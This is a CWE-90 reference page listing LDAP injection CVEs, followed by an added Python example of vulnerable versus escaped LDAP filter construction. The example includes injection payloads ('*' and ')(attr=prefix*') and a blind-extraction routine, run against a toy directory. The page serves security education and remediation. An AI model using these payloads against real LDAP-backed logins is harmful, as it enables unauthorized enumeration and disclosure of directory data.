CWE-90 · LDAP Injection
54 CVEs are classified under CWE-90 (LDAP Injection). The table below lists the first 20, ordered by score.
| CVE | Severity | Score | Published | Summary |
|---|---|---|---|---|
| CVE-2026-44930 | Critical | 9.8 | 2026-05-22 | An LDAP injection vulnerability in the LDAP Certificate repository of the XKMS server in Apache CXF may allow an attacker to retrieve arbitrary certificates fr… |
| CVE-2017-14596 | Critical | 9.8 | 2017-09-20 | In Joomla! before 3.8.0, inadequate escaping in the LDAP authentication plugin can result in a disclosure of a username and password. |
| CVE-2017-8790 | Critical | 9.8 | 2017-05-05 | An issue was discovered on Accellion FTA devices before FTA_9_12_180. The home/seos/courier/ldaptest.html POST parameter "filter" can be used for LDAP Injectio… |
| CVE-2016-9299 | Critical | 9.8 | 2017-01-12 | The remoting module in Jenkins before 2.32 and LTS before 2.19.3 allows remote attackers to execute arbitrary code via a crafted serialized Java object, which… |
| CVE-2026-41919 | Critical | 9.1 | 2026-05-19 | Improper Neutralization of Special Elements used in an LDAP Query ('LDAP Injection') vulnerability in Apache OFBiz. This issue affects Apache OFBiz: before 24… |
| CVE-2026-33289 | High | 8.8 | 2026-03-19 | SuiteCRM is an open-source, enterprise-ready Customer Relationship Management (CRM) software application. Prior to versions 7.15.1 and 8.9.3, an LDAP Injection… |
| CVE-2019-11277 | High | 8.4 | 2019-09-23 | Cloud Foundry NFS Volume Service, 1.7.x versions prior to 1.7.11 and 2.x versions prior to 2.3.0, is vulnerable to LDAP injection. A remote authenticated malic… |
| CVE-2026-40193 | High | 8.2 | 2026-04-15 | maddy is a composable, all-in-one mail server. Versions prior to 0.9.3 contain an LDAP injection vulnerability in the auth.ldap module where user-supplied user… |
| CVE-2026-34578 | High | 8.2 | 2026-04-09 | OPNsense is a FreeBSD based firewall and routing platform. Prior to 26.1.6, OPNsense's LDAP authentication connector passes the login username directly into an… |
| CVE-2026-44304 | High | 8.1 | 2026-05-12 | Lemur manages TLS certificate creation. Prior to 1.9.0, Lemur's LDAP authentication module (lemur/auth/ldap.py) constructs LDAP search filters using unsanitize… |
| CVE-2021-41232 | High | 8.1 | 2021-11-02 | Thunderdome is an open source agile planning poker tool in the theme of Battling for points. In affected versions there is an LDAP injection vulnerability whic… |
| CVE-2023-28853 | High | 7.7 | 2023-04-04 | Mastodon is a free, open-source social network server based on ActivityPub. Mastodon allows configuration of LDAP for authentication. Starting in version 2.5.0… |
| CVE-2020-5246 | High | 7.7 | 2020-07-14 | Traccar GPS Tracking System before version 4.9 has an LDAP injection vulnerability. It occurs when user input is being used in an LDAP search filter. By providing… |
| CVE-2023-29050 | High | 7.6 | 2024-01-08 | The optional "LDAP contacts provider" could be abused by privileged users to inject LDAP filter strings that allow access to content outside of the intended hi… |
| CVE-2023-3447 | High | 7.6 | 2023-06-29 | The Active Directory Integration / LDAP Integration plugin for WordPress is vulnerable to LDAP Injection in versions up to, and including, 4.1.5. This is due t… |
| CVE-2026-44671 | High | 7.5 | 2026-05-14 | ZITADEL is an open source identity management platform. From 2.71.11 to before 3.4.10 and 4.15.0, a vulnerability was discovered in Zitadel's LDAP identity pro… |
| CVE-2025-67493 | High | 7.5 | 2025-12-17 | Homarr is an open-source dashboard. Prior to version 1.45.3, it was possible to craft an input which allowed privilege escalation and getting access to groups… |
| CVE-2017-4927 | High | 7.5 | 2017-11-17 | VMware vCenter Server (6.5 prior to 6.5 U1 and 6.0 prior to 6.0 U3c) does not correctly handle specially crafted LDAP network packets which may allow for remot… |
| CVE-2015-7294 | High | 7.5 | 2017-09-06 | ldapauth-fork before 2.3.3 allows remote attackers to perform LDAP injection attacks via a crafted username. |
| CVE-2024-56841 | High | 7.4 | 2025-01-14 | A vulnerability has been identified in Mendix LDAP (All versions < V1.1.2). Affected versions of the module are vulnerable to LDAP injection. This could allow… |
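Most entries in the table describe the same defect: a login name or other user-controlled string is concatenated into an LDAP search filter without escaping. The following is an added example, not code from any of the listed projects, showing that pattern beside its hardened form, and going one step further than the summaries do by demonstrating blind extraction of a directory attribute through the unescaped filter. The sample directory, the `search` evaluator (a toy RFC 4515 parser standing in for a real server) and the names `build_filter_unsafe`, `build_filter_safe`, `escape_filter_value` and `blind_extract` are all constructed for this illustration.

```python
"""Added example (not code from any project in the table): a username pasted
into an LDAP search filter changes the filter's structure; RFC 4515 value
escaping stops that.  DIRECTORY and the evaluator are constructed stand-ins
for a real server and exist only to make the filters' effects observable."""
import re

# Constructed sample directory: attribute name (lower-case) -> values.
DIRECTORY = [
    {"objectclass": ["person"], "uid": ["alice"], "description": ["staff"]},
    {"objectclass": ["person"], "uid": ["bob"], "description": ["admin"]},
    {"objectclass": ["groupofnames"], "cn": ["admins"], "member": ["uid=bob"]},
]

# RFC 4515 section 3: characters that must be escaped as \XX inside a value.
_ESCAPES = {"\\": "\\5c", "*": "\\2a", "(": "\\28", ")": "\\29", "\x00": "\\00"}

def escape_filter_value(value: str) -> str:
    """Escape an assertion value so it can only ever be matched literally."""
    out = []
    for ch in value:
        if ch in _ESCAPES:
            out.append(_ESCAPES[ch])
        elif ord(ch) > 0x7F:  # non-ASCII: \XX per UTF-8 byte
            out.append("".join(f"\\{b:02x}" for b in ch.encode("utf-8")))
        else:
            out.append(ch)
    return "".join(out)

def build_filter_unsafe(username: str) -> str:
    """The CWE-90 pattern: the login name is concatenated in unescaped."""
    return f"(&(objectClass=person)(uid={username}))"

def build_filter_safe(username: str) -> str:
    return f"(&(objectClass=person)(uid={escape_filter_value(username)}))"

# Minimal RFC 4515 evaluator: AND, OR, equality and substring assertions.
def _parse(s: str, i: int):
    if i >= len(s) or s[i] != "(":
        raise ValueError(f"expected '(' at {i}")
    i += 1
    if s[i] in "&|":
        op, i, kids = s[i], i + 1, []
        while i < len(s) and s[i] == "(":
            node, i = _parse(s, i)
            kids.append(node)
        if i >= len(s) or s[i] != ")":
            raise ValueError(f"expected ')' at {i}")
        return (op, kids), i + 1
    eq = s.index("=", i)
    attr, k, pattern = s[i:eq].lower(), eq + 1, []
    while k < len(s) and s[k] != ")":
        if s[k] == "\\":                       # \XX escapes -> literal bytes
            raw = bytearray()
            while k < len(s) and s[k] == "\\":
                raw.append(int(s[k + 1:k + 3], 16))
                k += 3
            pattern.append(re.escape(raw.decode("utf-8")))
        elif s[k] == "*":                      # an unescaped * is a wildcard
            pattern.append(".*")
            k += 1
        else:
            pattern.append(re.escape(s[k]))
            k += 1
    if k >= len(s):
        raise ValueError("unterminated assertion")
    rx = re.compile("^" + "".join(pattern) + "$", re.DOTALL)
    return ("=", attr, rx), k + 1

def _matches(node, entry) -> bool:
    if node[0] == "&":
        return all(_matches(c, entry) for c in node[1])
    if node[0] == "|":
        return any(_matches(c, entry) for c in node[1])
    _, attr, rx = node
    return any(rx.match(v) for v in entry.get(attr, []))

def search(filter_str: str) -> list:
    """Uids matching filter_str; trailing data is rejected as a server would."""
    node, end = _parse(filter_str, 0)
    if end != len(filter_str):
        raise ValueError("malformed filter: trailing data")
    return [e["uid"][0] for e in DIRECTORY if "uid" in e and _matches(node, e)]

def blind_extract(build, uid: str, attr: str, alphabet: str = "abcdefghijklmnopqrstuvwxyz") -> str:
    """Blind LDAP injection: append ')(attr=prefix*' to a known uid and read attr
    one character at a time from whether the user is still returned."""
    prefix = ""
    while True:
        for ch in alphabet:
            if search(build(f"{uid})({attr}={prefix}{ch}*")):
                prefix += ch
                break
        else:
            return prefix

if __name__ == "__main__":
    print(search(build_filter_unsafe("*")), search(build_filter_safe("*")))
    print(repr(blind_extract(build_filter_unsafe, "bob", "description")))
```

With the unsafe builder a bare `*` enumerates every person entry, and `blind_extract` recovers bob's `description` attribute from a yes/no oracle (whether the login lookup still finds the user), which is the shape of the "access content outside of the intended" scope the summaries describe. With the safe builder the same probes are escaped into literal values, match nothing, and leak nothing; note that escaping values is the fix for this class, while attribute names or whole filter strings taken from users (as in the Accellion "filter" parameter) need an allow-list rather than escaping.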